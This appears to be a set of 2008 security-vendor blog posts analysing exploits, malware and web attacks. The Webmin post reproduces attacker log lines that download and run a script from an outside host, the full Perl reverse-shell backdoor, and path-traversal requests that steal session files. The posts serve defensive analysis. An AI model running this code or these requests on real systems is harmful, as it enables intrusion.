Next I checked the logs on the router and identified an active host on the network that was not my own. I then tried to open a NetBIOS NULL session with the host which worked. So far everything I tried had worked on the first attempt. Getting the NULL session opened up some opportunities for some good information gathering. For one, I determined that the host was running Windows 2000. More interestingly, I was able to get a list of user accounts. All without the need for a username and password. Only one of the accounts sounded like it was user-created. I tried to map a drive using that account with a blank password, and failed. I tried a few more times before giving up on guessing passwords.

I was using my work laptop so I had a Foundstone Enterprise install handy. I scanned the host for vulnerabilities, looking out for anything remotely exploitable. I came up with a handful, but one check jumped out at me – “Administrator Account Has No Password”. I tested this by mapping a drive with the administrator account and a blank password, half hoping that it was a mis-detection. Alas, the map succeeded and at this point the demonstration was over. I now had full access to my friend’s filesystem, and now the possibilities were endless. Having an Administrator account with a blank password on a Windows machine is such an old security hole that I didn’t even bother to test it early on.

For the home user, here are just a couple of tips to get you started with security and get you in way better shape than my friend:

  1. Secure your wireless network. Look up how to do it online or have your techie friend do it for you, like I did for mine.
  2. Set a strong password for your Windows Administrator account. Better yet, disable the account.
  3. Disable NULL sessions. Look up how to do it online.

Localized 0-day Once Again: Exploit-TaroDrop.e

One of the issues that we’ve been highlighting at our recent conference presentations and blogs was the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor, Ichitaro, last Friday.

This Japanese application has been known to be under targeted attack for several years, and a few 0-day vulnerabilities were discovered and exploited in the past. Other than Ichitaro, other popular and localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities even months after they have already been patched by the vendor.

Users should continue to stay vigilant about suspicious email attachments and should not open unknown files. Please be sure to update your applications, whether popular or not, with the latest security patches to protect you and your organization from known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledged the vulnerability and will be posting a patch.

J2ME Security Vulnerabilities Discovered

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow untrusted Java MIDlets to run. Once those are used, relatively recent phones running S40 3rd Edition are open to malicious MIDlets that exploit the other vulnerabilities.

According to the researchers the vulnerabilities allow:

  • gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
  • running a malicious MIDlet when the phone is first turned on
  • accessing files
  • sending SMS/MMS
  • making phone calls
  • reading your contacts
  • accessing the SIM card
  • eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesber, which only caused premium-rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof-of-concept (PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

New PDF exploits: “Old wine in a new bottle!”

We came across some samples, and some vendors claimed that these samples were exploiting the new PDF vulnerability CVE-2008-2641.

We took a look at this issue and found that this is not the case: the samples are still exploiting the old vulnerability CVE-2007-5659, a buffer overflow in the JavaScript function Collab.collectEmailInfo in Adobe Reader's own JavaScript engine.

The JavaScript itself was compressed inside the PDF file. After decompressing the content, it turned out to be obfuscated JavaScript code. After digging through the obfuscated code, the real exploit was found encrypted in a long string. A function decrypts the string into the real exploit code and then passes it to eval().

Interestingly, the function uses its own source code (arguments.callee) as part of the decryption key, so simply replacing eval() with alert() or document.write() to dump the real exploit does not work: the eval() call itself is part of the key. It is an interesting way to obfuscate exploit code and keep security researchers from reaching the real exploit, almost like a 'self-checksum' mechanism.
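To make the mechanism concrete, here is an added example (not code from the post or from the sample it analyses) that reconstructs a self-keyed decoder with a benign payload and shows the analyst-side capture that does work: hooking the global eval at runtime instead of editing the decoder's source. The hash and XOR scheme, the function names and the payload are all hypothetical; decoderStage.toString() stands in for arguments.callee, which strict-mode code cannot use.

```javascript
// Added example, not code from the original post: a minimal reconstruction of
// the "self-checksum" decoder described above, with a benign payload, and the
// analyst-side capture that leaves the decoder's source untouched.
// All function names and the hash/XOR scheme are hypothetical.

// Derive a 32-bit key from a function's own source text. Editing the function
// (for instance swapping eval for alert) changes the text and thus the key.
function keyFromSource(src) {
  let h = 0;
  for (let i = 0; i < src.length; i++) {
    h = (h * 31 + src.charCodeAt(i)) >>> 0;  // simple rolling hash
  }
  return h;
}

// XOR each character code with one byte of the key. XOR is symmetric, so the
// same routine both encodes and decodes.
function xorWithKey(text, key) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    const k = (key >>> ((i % 4) * 8)) & 0xff;
    out += String.fromCharCode(text.charCodeAt(i) ^ k);
  }
  return out;
}

// The decoder stage in the style the post describes: its key is its own source
// text (decoderStage.toString() here, standing in for arguments.callee) and
// the decoded text goes straight to eval.
function decoderStage(blob) {
  var key = keyFromSource(decoderStage.toString());
  var code = xorWithKey(blob, key);
  return eval(code);
}

// Constructed, benign "payload" standing in for the real exploit code.
const PAYLOAD = '"decoded:" + (6 * 7)';

// Build the blob as the obfuscator would: encode against the key derived from
// the unmodified decoder.
function buildBlob() {
  return xorWithKey(PAYLOAD, keyFromSource(decoderStage.toString()));
}

// Running the untouched decoder evaluates the payload.
function runUntouched() {
  return decoderStage(buildBlob());   // -> "decoded:42"
}

// The shortcut the post warns against: rewrite "eval" to something else in
// the decoder's source. The key no longer matches, so the output is noise.
function decodeWithEditedSource() {
  const editedSrc = decoderStage.toString().replace('eval(code)', 'alert(code)');
  return xorWithKey(buildBlob(), keyFromSource(editedSrc));
}

// Analyst approach that works: leave the decoder alone and hook the global
// eval at runtime. The source text (and hence the key) is unchanged, while
// the decoded code is captured instead of executed.
function captureWithoutEditing() {
  const realEval = globalThis.eval;
  let captured = null;
  globalThis.eval = function (s) { captured = s; };
  try {
    decoderStage(buildBlob());
  } finally {
    globalThis.eval = realEval;
  }
  return captured;
}
```

Any analysis step that edits the decoder's text (renaming eval, inserting a print) changes the key and yields noise, whereas substituting the sink at runtime leaves the text, and so the key, intact; the same holds when such samples are run inside an instrumented JavaScript engine.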

After we figured out how to get the real JavaScript exploit code, we found that it exploits CVE-2007-5659 reliably using a heap-spray technique.

Some vendors claim that the exploit works on older versions but crashes 8.1.2. This is not the case: the heap spray simply takes some time to fill memory, and during that period we observed that Adobe Reader stopped responding, but it did not crash. After a couple of minutes it returned to normal and popped up a "Send by Email for review" dialog box. In short, Adobe Reader 8.1.2 appears to be immune to this exploit because Adobe has already patched this vulnerability.

Two new Linux kernel vulnerabilities discovered & patched

Avert Labs recently discovered and reported a couple of Linux kernel vulnerabilities, both of which have been patched by the Linux kernel maintainers.

The first is a remote BER decoding vulnerability (CVE-2008-1673). This vulnerability was patched by the Linux dev team on 9 June 2008.

This vulnerability is a kernel heap overflow in the CIFS module and the ip_nat_snmp_basic module. It is possible to reach the exploitable condition on 64-bit platforms. Though it is hard to trigger a kernel heap overflow on 32-bit platforms, it is still possible to crash the Linux box. We strongly recommend that users update to the following kernel versions:

Linux kernel 2.6.25.5
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.4.36.6

Some vendors have mistakenly marked this as a vulnerability exploitable only from the local network. A correction for them: this vulnerability is remotely exploitable. We contacted one such security service provider, who had described this issue as exploitable over the 'local network' only, and got this response:

“According to our information the ASN.1 decoding vulnerability exists within the modules handling CIFS and SNMP traffic. These are both protocols which we think should be firewalled off the Internet via common “best practices”, thus we set the attack vector to “local network” only.”

I don't really agree with this approach: is anything that can be firewalled then only locally exploitable? In fact I would rather say that it is remote vulnerabilities like these that need firewall policies to be enabled, not the other way round. I would love to hear opinions from others on this issue.

BTW our McAfee Network Security Platform (formerly IntruShield) has already been updated with content to protect against this vulnerability.

The other issue was found by Brandon Edwards and is another interesting issue, this time in DCCP: a local privilege escalation vulnerability (CVE-2008-2358). The vulnerability (supposedly) exists only in 2.6.17, 2.6.18, and 2.6.19, due to boundary checks in the upstream kernel versions. It is non-trivial to exploit this vulnerability.

Nuwar circulating a fake topic – Beijing earthquake

Nuwar families are known for using social engineering to trick users into downloading them. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic: a Beijing earthquake (not the Sichuan earthquake!).

If users click on the fake video image, the file "beijin.exe" (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don't click it: the page has an iframe link to a malicious JavaScript.

Upon accessing the above page, the obfuscated JavaScript is downloaded and run because of the injected iframe. The JavaScript exploits the RealPlayer vulnerability CVE-2008-1309 and downloads another variant of Nuwar. McAfee VSE blocks the script and detects it as "JS/Exploit-Shell.gen".

At the time of writing, the download file was corrupted.

Flash Player Exploit Update 2

Last night our researchers identified similarities between the recent Adobe Flash exploits and a known (patched) vulnerability: CVE-2007-0071. At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.

The exploits that we have captured from the field do not appear to exploit the latest version of Flash. We continue to hunt for missing 9,0,124 exploits and will post an update should one be discovered. In the meantime, it’s best to update to the latest player, if you haven’t yet done so.

Flash Player Exploit Update

Here's a quick update to the earlier post on a new unpatched Adobe Flash vulnerability. While looking for sites serving these SWF exploits, we found a connection with recent mass hacks. Hacked sites reference an external script, just as they have for quite some time. But the external scripts now reference an SWF file. This SWF file references another SWF file named WIN%209,0,124,0i.swf (WIN 9,0,124,0i.swf), which seems to be offline. While we cannot confirm that this last SWF file attempts to exploit this new vulnerability, Symantec mentioned the same domain serving the exploit earlier. SANS also mentions another domain and two presumed exploits, named WIN%206,0,79,0ff.swf (WIN 6,0,79,0ff.swf) and WIN%206,0,79,0ie.swf (WIN 6,0,79,0ie.swf), also offline. These file names suggest three things:

1) Different exploits are crafted to exploit different versions of Adobe Flash, in this case 9,0,124,0 and 6,0,79,0.
2) Versions of the exploit may also exist, or be under development, to target other operating systems, as the aforementioned file names begin with WIN.
3) Exploits exist for both Internet Explorer and Firefox, as the file names end in "i", "ie", or "ff".

Thus far we've identified two particular domains involved in mass hacks that are also believed to have served these Flash exploits. Combined, Google yields approximately 250,000 page results when searching for those references (i.e., compromised sites that link to scripts that link to Flash exploits).

Again, this threat is still under analysis; more details to follow.

Mass Hacks Likely to Hang Around for a While

In March I blogged about a round of mass Web site compromises. Since then there have been several other instances discovered, as well as a couple of smoking guns. The net result is that the bad guys are using automated tools to find and attack Web applications that are vulnerable to SQL-injection attacks. Many of these applications are homegrown, so there is no patch or hotfix for administrators to install. This means that simply removing the injected malicious code won't last long.

Just now I was reviewing the latest batch of hacked sites, and I noticed pages that were previously compromised and “repaired,” only to be compromised again. The entry point for these attacks must be closed in order to thwart future attacks. This means that underlying code must be audited and improper input validation must be corrected. And given that many Web administrators install out-of-support freeware and shareware applications, we can expect many sites to remain vulnerable for a very long time.

McAfee's Foundstone Hacme Shipping tool can be a useful resource for those in need of a better understanding of how common Web application attacks occur and how to properly code against them.

Hacme Shipping 1.0
Hacme Shipping is a Web-based shipping application developed by Foundstone to demonstrate common Web application-hacking techniques such as SQL injection, cross-site scripting, and escalation of privileges, as well as authentication and authorization flaws and how they are manifested in the code. Written in ColdFusion MX 7 using the Model-Glue framework and a MySQL database, the application emulates the online services provided by major shipping companies.

The commercial HTML packer dilemma

Following the big noise caused by the latest mass injection of web sites with malicious JavaScript, which infected many computers via a number of exploits, I decided to take a look at the trail that was left behind, which has proven to be an interesting exercise!

A few days ago I noticed a large number of websites that were misbehaving, and I came across many pages that would fire up the usual ActiveX alert in my Internet Explorer 7 after loading a JavaScript called (on this occasion) addr.js. Not surprisingly, these were mostly based in China, and here is a snippet of code that most of you would probably recognise by now.

So far nothing new: the JavaScript function you can see above was designed by Dean Edwards to obfuscate HTML code. It has been discussed in many posts and is a popular method for web developers to "hide" sensitive source code on their pages. Unfortunately, it is also a popular method for hiding malicious code, and the example above does just that. Here are some interesting parts of the decoded version of the above example:

try{if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)

This checks whether the version of Internet Explorer is 7, and the script then loads the following IFRAMEs depending on other factors such as GMT offset, ActiveX availability, the presence and version of RealPlayer, etc.

<iframe style=display:none src="http:// :///ms.gif">
<iframe style=display:none src=":///xl.gif">
<iframe style=display:none src="http:// :///bd.gif">
<iframe style=d'+'isp'+'lay:none src="http:// :///r'+'eal.g'+'if">
<iframe style=d'+'isp'+'lay:none src="http:///r'+'eal_new.g'+'if">
<iframe style=display:none src="http:// :///lz.gif">

As we can see, six IFRAMEs are hidden in the code, and they will load various pages with exactly the same exploits (with minor variations) that were used in the recent mass injection a couple of weeks ago.

So you might ask, what's new about that? Well, what is worrying is that the pages loaded by the IFRAMEs attempt to grab fake GIF (image) files that are in fact hiding more JavaScript code, this time obfuscated by yet another commercial tool called HTMLSHIP.

The following snippet is an example from one of the pages hiding a RealPlayer Exploit:

As you may have noticed, this is pretty much unreadable, but here is the important part of the code de-obfuscated using one of my favourite tools, the Caffeine Monkey implementation of the Mozilla browser engine from Ben Feinstein and Daniel Peck at SecureWorks.

Above we can see the CLSID for the RealPlayer ActiveX control, and below we can see some of the code used to exploit the vulnerability described here.


So far I have seen a few variations in the domains used to host the various exploits involved, as well as in the names of the JavaScript files, and we will be monitoring these for changes to see whether this will be used more extensively in the future.

As of today the samples I discovered are still not detected by any AV … Well except one that is… ;-)

An additional note: the techniques used to obfuscate malicious JavaScript on web pages are becoming more sophisticated and more difficult to signature for conventional AV engines. Nowadays there are a large number of tools similar to the ones mentioned above, allowing malware authors to obfuscate with ease.

To draw a quick parallel with binary files and their respective packers (compressors, protectors, encryptors and so on): this is not a new technique, but as I said, things are becoming more sophisticated, just as with UPX versus the likes of Armadillo, ASProtect and others.

To hide or not to hide

In an ideal world, the people making this commercial protection software available should have no need to hide code in such convoluted ways, and perhaps, in the case of web design, people should be more aware of other practices to keep code secure and safe for copyright and/or trademark reasons, for example server-side scripting, or using Ajax and Java servlets.

If I were to embark on the task of leeching the code of a particularly interesting web page, and I understood the inner workings of scripting languages such as JavaScript or Microsoft's JScript implementation for IE, I would not be stopped by such trivial means of hiding the code, which can easily be reverted to its original form with a few clicks and the latest version of a browser engine such as Mozilla's JavaScript C engine.

Many ideas are being brought forward in the field of packing and how to counteract the incredible rise in malware variants it causes. Perhaps people making legitimate software and writing legitimate HTML code for web pages should come to terms with the fact that "security through obscurity" has failed miserably to deliver, and that the cleaner their products are, the easier it will be for all of us to identify suspicious illegal software/code, making the task of identifying the bad guys a little less daunting. However, this is far from an ideal world ;-)
Errr… Linux anyone?

Honey, I missed the ‘()’!!: Zero-Day Bug fixed in PHP

Some time back we came across an interesting vulnerability posted by a Chinese researcher on his blog, claiming to have found a zero-day vulnerability in PHP 5.2.3.

We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability based on the information provided in the blog. After investigation, we found that this vulnerability affects not only version 5.2.3 but also version 5.2.5. It is a heap overflow that can be triggered when a web server with PHP receives a malformed URI request; it can be as simple as "GET /index.php/aa HTTP/1.1". Successful exploitation can result in arbitrary code execution with the privileges of the web server.

This happens because the author misplaced a bracket, resulting in a miscalculation of the buffer size, which can lead to a heap overflow. So fixing this issue is also simple: in \sapi\cgi\cgi-man.c, grep for "ptlen + env_path_info ? strlen(env_path_info) : 0;" and replace it with "ptlen + (env_path_info ? strlen(env_path_info) : 0);".
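As an added illustration (not the PHP project's code), here is the precedence slip reproduced in JavaScript, where + also binds more tightly than ?: exactly as in C. The roles given to ptlen (length of the translated script path) and env_path_info (the trailing PATH_INFO, "/aa" in the request above) are assumptions about the post's variables, and the copy model is a simplification.

```javascript
// Added example, not from the PHP source tree: the precedence slip described
// above, reproduced in JavaScript. The roles of ptlen (length of the
// translated script path) and envPathInfo (trailing PATH_INFO) are assumed.

// How the buggy line parses: (ptlen + envPathInfo) ? envPathInfo.length : 0.
// In C, ptlen + pointer is pointer arithmetic and is non-zero for any valid
// pointer, so the condition is always true and ptlen silently drops out of
// the computed size. When env_path_info is NULL the C code ends up calling
// strlen(NULL); the JavaScript equivalent throws a TypeError on null.length.
function buggyLength(ptlen, envPathInfo) {
  return ptlen + envPathInfo ? envPathInfo.length : 0;
}

// The corrected line: the parentheses force the conditional to be evaluated
// before the addition, so ptlen is always part of the size.
function fixedLength(ptlen, envPathInfo) {
  return ptlen + (envPathInfo ? envPathInfo.length : 0);
}

// Simplified model of the later copy into the allocated buffer: the code
// writes the script path followed by PATH_INFO, so it needs
// ptlen + PATH_INFO length bytes. Returns how many bytes the write exceeds
// the allocation by (0 means the buffer is large enough).
function overflowBytes(sizeFn, scriptPath, envPathInfo) {
  const ptlen = scriptPath.length;
  const allocated = sizeFn(ptlen, envPathInfo);
  const written = ptlen + (envPathInfo ? envPathInfo.length : 0);
  return Math.max(0, written - allocated);
}

// Worked instance for the request "GET /index.php/aa": the translated script
// path is a constructed value; PATH_INFO is "/aa".
function demo() {
  const scriptPath = '/var/www/index.php';   // 18 characters, constructed
  return {
    buggyOverflow: overflowBytes(buggyLength, scriptPath, '/aa'),   // 18
    fixedOverflow: overflowBytes(fixedLength, scriptPath, '/aa'),   // 0
  };
}
```

The buggy form undersizes the buffer by exactly ptlen bytes, so every extra byte of the script path becomes heap data overwritten past the allocation; the fixed form sizes it correctly and also stops the NULL case from reaching the length call.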

This is a classic example of how small human errors (sometimes even typos) can result in vulnerabilities.

We reported this issue to the PHP dev team almost immediately after we learned of it in the wild, and they have just come out with a patch. We highly recommend that users update to the latest version, PHP 5.2.6. Besides this issue, the release includes a host of other security-related fixes, some of which we deem critical. This specific issue affects the FastCGI packages of PHP.

This issue has been given the identifier CVE-2008-0599.

We shall continue to monitor this threat and update if we come across anything malicious.

NULL Pointer Exploitation Causes Concern

Some news is in circulation regarding a recently disclosed (and patched) vulnerability in Adobe’s Flash. The attack used dereferenced NULL pointers, which were believed to be very hard to exploit.

The findings were first revealed in a paper called "Application-Specific Attacks: Leveraging the ActionScript Virtual Machine" (pdf) by Mark Dowd. The paper described a new technique for causing an exploitable memory corruption vulnerability in Adobe's Flash. Whilst the technique targeted the ActionScript Virtual Machine on the Win32/Intel platform, it is understood that the attack could be carried out on any other platform where Flash is available. The real question is whether this attack can be made more generic to target dereferenced NULL pointers in general.

It is possible to do so, but it's not that easy. There are certain conditions an exploit of this type has to satisfy before reaching the ultimate goal. Dowd used some wacky techniques to inject malicious ActionScript bytecode into the Flash runtime (basically by crafting an SWF with something to trigger the vulnerability and point execution to another loaded-in-memory part of the file that held the malicious content). Then he forced malloc() to fail by trying to allocate a huge memory chunk. When malloc() failed, it returned NULL.

(OK, at this step a program trying to access a NULL pointer would basically crash, and something to check for malloc() return value is necessary to prevent that crash.)

In this case, Flash didn't check for malloc() failure and performed a pointer arithmetic operation, adding the value of the pointer (NULL here) to some offset. Now, this "offset" was controllable, and this is where Dowd had preloaded his malicious content. (Don't get too excited, folks. There were quite a few other conditions that Dowd's exploit had to meet before loading his payload, but I'm leaving out a lot of details to present the overall picture.) So now we have a pretty successful and reproducible exploit on the Flash ActionScript VM. It even bypassed Vista's ASLR because Vista's Flash was compiled with the runtime security bit off.

Now, scaling this attack against native code is more difficult in spite of the success it had against ActionScript VM. We will still be looking for a controllable offset and a place to preload our payload. Nevertheless, it is still a neat discovery when taking into consideration the level of complexity needed to load the malicious payload.

This discovery reflects a trend that it is possible to circumvent runtime security countermeasures such as ASLR and the like by targeting other environments with higher privileges running on top of the native platform. And if you’re involved in any secure development lifecycle, you’d better go and check your code!

Potential Microsoft Works ActiveX Zero-Day Surfaces

A Microsoft Works ActiveX potential zero-day threat has been disclosed on a handful of Chinese blog sites. This threat was originally posted as a proof of concept that caused a Windows host to crash, but very soon after, a working exploit was posted. (Show of hands: Who’s surprised?)

Here's the meat of this: the flaw lies in an ActiveX component of Microsoft Works Image Server (WkImgSrv.dll). Yes, it appears successful exploitation would allow code execution via a controlled pointer. For this to occur, the victim would need to visit a malicious Web site.

On the plus side, this control is not marked safe, and attempts to use it should be accompanied by a warning from Internet Explorer. Even so, you will want to set the kill bit for clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 to help mitigate the issue. Initial testing on Windows XP SP2 and Internet Explorer 7 shows this to be easily exploitable once past the "warning" hurdle.

In the meantime, McAfee Avert Labs will continue researching this issue.

Update: June 6, 2008
Microsoft has confirmed that exploitation of this issue is not possible due to the control not being safe for scripting, nor safe for initialization. They have a nicely written, thorough write-up here explaining why.

Good Offense Not the Best Anti-Virus Defense

There was an interesting article in InformationWeek this morning about a couple of security researchers who have presented the possibility of using offensive technologies to go after hackers. The most recent was Joel Eriksson from Bitsec, who presented at RSA last week about exploiting security holes in remote-access Trojans.

The article also brings up a five-year-old example of an earlier attempt at offensive technology to be used against hackers. In this case, Tom Liston created a tool called LaBrea (after the tar pits) that would ensnare computers which were being used to attack it either intentionally or due to worm infection.

There are plenty of people within the security industry who would like to be able to employ these tactics. The urge to take a pound of flesh for the late nights and weekends spent dealing with malware attacks is certainly understandable. But I know very few people in this industry who actually think it’s a sound idea, or worth the potential legal trouble.

Just as there are few locales where it is legal for you to shoot an intruder in your home, there are few locales where it is legal for you to attack those who intrude on your computer. Even in those locales where it is not illegal to attack an intruder, you must take into consideration the possible court costs. It’s highly likely the survivor (either the intruder or a family member) will sue you, and it will take some time with a lawyer to defend yourself against these charges. It’s entirely possible that a hacker or a worm-infected user would do likewise.

This is still assuming that your case was reasonably clear-cut, that it was genuinely a hacker or worm infection that was coming after you. It could just as easily be used as a sort of alternate flavor of Denial of Service attack–spoof the traffic or exploit a machine for the purpose of making it a target.

The general computing population is not particularly knowledgeable about the inner workings of their machines; some say there should be licensing such as for driving a car. It’s my opinion that there would first have to be this sort of licensing, and then a permit akin to a “Concealed Carry Permit” before this could be considered a good idea.

The Internet is a scary enough place without adding even more unskilled attackers.

MS08-021 Exploit Activity Increasing

Last week, during our monthly Patch Tuesday podcast, we discussed the fact that Microsoft credited three different researchers for reporting CVE-2008-1087. The fact that several independent researchers reported the issue suggested that others may not be far behind. This CVE pertains to the Microsoft Graphics Rendering Engine, which has a history of exploitation. In fact, McAfee's Exploit-WMF detection for MS06-001 exploits was one of the top reported detections around the time that patch was released. An exploit toolkit was released prior to the patch, which helped contribute to the number of exploits floating around. History may be repeating itself, though out of sequence.

Last Friday the first MS08-021 exploit was discovered in the field, three days after the issue was patched; and though it was not widespread, the discovery of the exploit did highlight the fact that attackers were actively working with exploit code. Today a basic exploit toolkit was posted publicly; and while this new toolkit is primitive, it may very well lead to one-upmanship and the distribution of a more powerful tool.

Given that a patch was released prior to this recent exploit activity, it is unlikely that MS08-021 attacks will reach the level of MS06-001 attacks. However, there are still many, many vulnerable systems out there, and we've seen prevalent exploits that have lasted for years after the issue was patched.

Fribet – Attacking Your Backend Database from Your Backyard

Just a month ago, we blogged about massive security incidents relating to SQL injection attacks that insert iframe links to remote sites hosting exploit scripts and malware. Recently, we discovered the Fribet trojan, whose author was riding on both the success of such attacks and the controversy of the Tibet issue. The trojan was discovered on pro-Tibet sites that were possibly hijacked to host Exploit-MS07-004, which appears to be specifically crafted.

When visitors to the pro-Tibet websites are infected, the Fribet trojan provides remote control and monitoring functions such as creating new files or folders, starting or terminating processes, and sending/receiving additional malware. Additionally, the Fribet trojan loads the "SQL Native Client" ODBC library and is designed to receive arbitrary SQL statements from a command-and-control server. In turn, the ODBC library gives Fribet the ability to bind SQL connections and run arbitrary SQL commands from the victim machine(s). At the time of our research, the command-and-control server was not sending us commands. However, our reverse engineering of the malicious code shows it is more than capable of the following:

  • Bind and connect to local or remote databases from the victim machine
  • Query and steal data from local or remote databases
  • Insert arbitrary data into local or remote databases, including web data such as hosting a web exploit

The attacker still needs to find out the information required to connect to the database, such as DSN, hostname, database name, user and password; however, that information can be collected via Fribet's other monitoring functions, and it can also enumerate weak and default values.

This trojan can apparently be used as an alternative to SQL injection attacks, but in a more direct way. Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure that database backends are equally secure to defend against such a penetration vector.

Webmin SessionID Hacking

I made some interesting observations recently while looking through Webmin logs. It seems that someone was playing with Webmin worm/autorooter tools. Here is a piece of the webmin log:

root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;uname -a;id;uptime'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;unset HISTFILE HISTLOG HISTSAVE SCREEN'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;ls'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;wget aa.bb.cc/d.pl'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;cat /etc/issue'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;perl d.pl 2.2.2.2 2008'

Here we can see some suspicious activity: in particular, the Webmin root user connecting from 1.1.1.1 and trying to download and execute a Perl script from aa.bb.cc on the system hosting Webmin. The script contained code to spawn a shell and connect back to 2.2.2.2 on port 2008.

#!/usr/bin/perl
use Socket;
print "Data [removed] Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}
print "[*] Datached\n\n";

By examining the Webmin log in further detail, it was possible to determine that the attacker used an older Webmin vulnerability ("Webmin Arbitrary File Disclosure Vulnerability", CVE-2006-3392) to retrieve the webmin.log and sessiondb.pag files.

1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/webmin.log HTTP/1.0" 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/sessiondb.pag HTTP/1.0" 200 1024

The attacker then tried to access Webmin’s /shell/index.cgi page as follows:

1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921

We know that access to /shell/index.cgi requires authentication using a valid Webmin user and corresponding password. However, we see that the attacker was able to access this resource without supplying a password (we see that the HTTP response code is 200). It turns out that this was possible because Webmin stores user session ID values in the webmin.log & sessiondb.pag files. If an attacker can retrieve these files then they can re-use the session ID of a user to access resources as that user without having to supply a password.

For example, here is an entry in webmin.log:

[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 x.x.x.x proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'

"f3fe4b90803a41096af8880e2e948a24" is the session ID in this entry. These session IDs are valid for one week unless a user explicitly logs out of the Webmin interface by clicking the "logout" link. Since most users don't do this, most session IDs continue to be valid long after they are needed. An attacker using a file disclosure vulnerability such as the one described above can retrieve and reuse these session IDs to impersonate users. The ability to impersonate users in this manner can lead to complete compromise of affected systems (because /shell/index.cgi can be used to execute arbitrary commands).
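The three signs described in this post, as an added example that is not part of the original: a small triage script over constructed log lines in the same formats as the excerpts above (the Webmin action log and the HTTP access log). The session ID, timestamps and addresses are made up, and the documentation ranges 192.0.2.0/24 and 203.0.113.0/24 stand in for real hosts.

```javascript
// Added example, not part of the original post: triage of the two log sources
// discussed above. All sample lines are constructed to mirror the post's
// formats; the session ID, addresses and timestamps are invented.

const WEBMIN_LOG = [
  // legitimate admin session from the office address
  `[02/Feb/2008 06:20:11] root f3fe4b90803a41096af8880e2e948a24 192.0.2.10 proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'`,
  // the same session ID, from a different address, driving the shell module
  `[02/Feb/2008 06:31:46] root f3fe4b90803a41096af8880e2e948a24 203.0.113.9 shell index.cgi "run" "-" "-" cmd='echo -n MARKER;uname -a;id'`,
  `[02/Feb/2008 06:31:50] root f3fe4b90803a41096af8880e2e948a24 203.0.113.9 shell index.cgi "run" "-" "-" cmd='echo -n MARKER;cat /etc/issue'`,
];

const ACCESS_LOG = [
  `203.0.113.9 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/..%01/..%01/..%01/var/webmin/webmin.log HTTP/1.0" 200 390944`,
  `203.0.113.9 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/..%01/..%01/..%01/var/webmin/sessiondb.pag HTTP/1.0" 200 1024`,
  `203.0.113.9 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921`,
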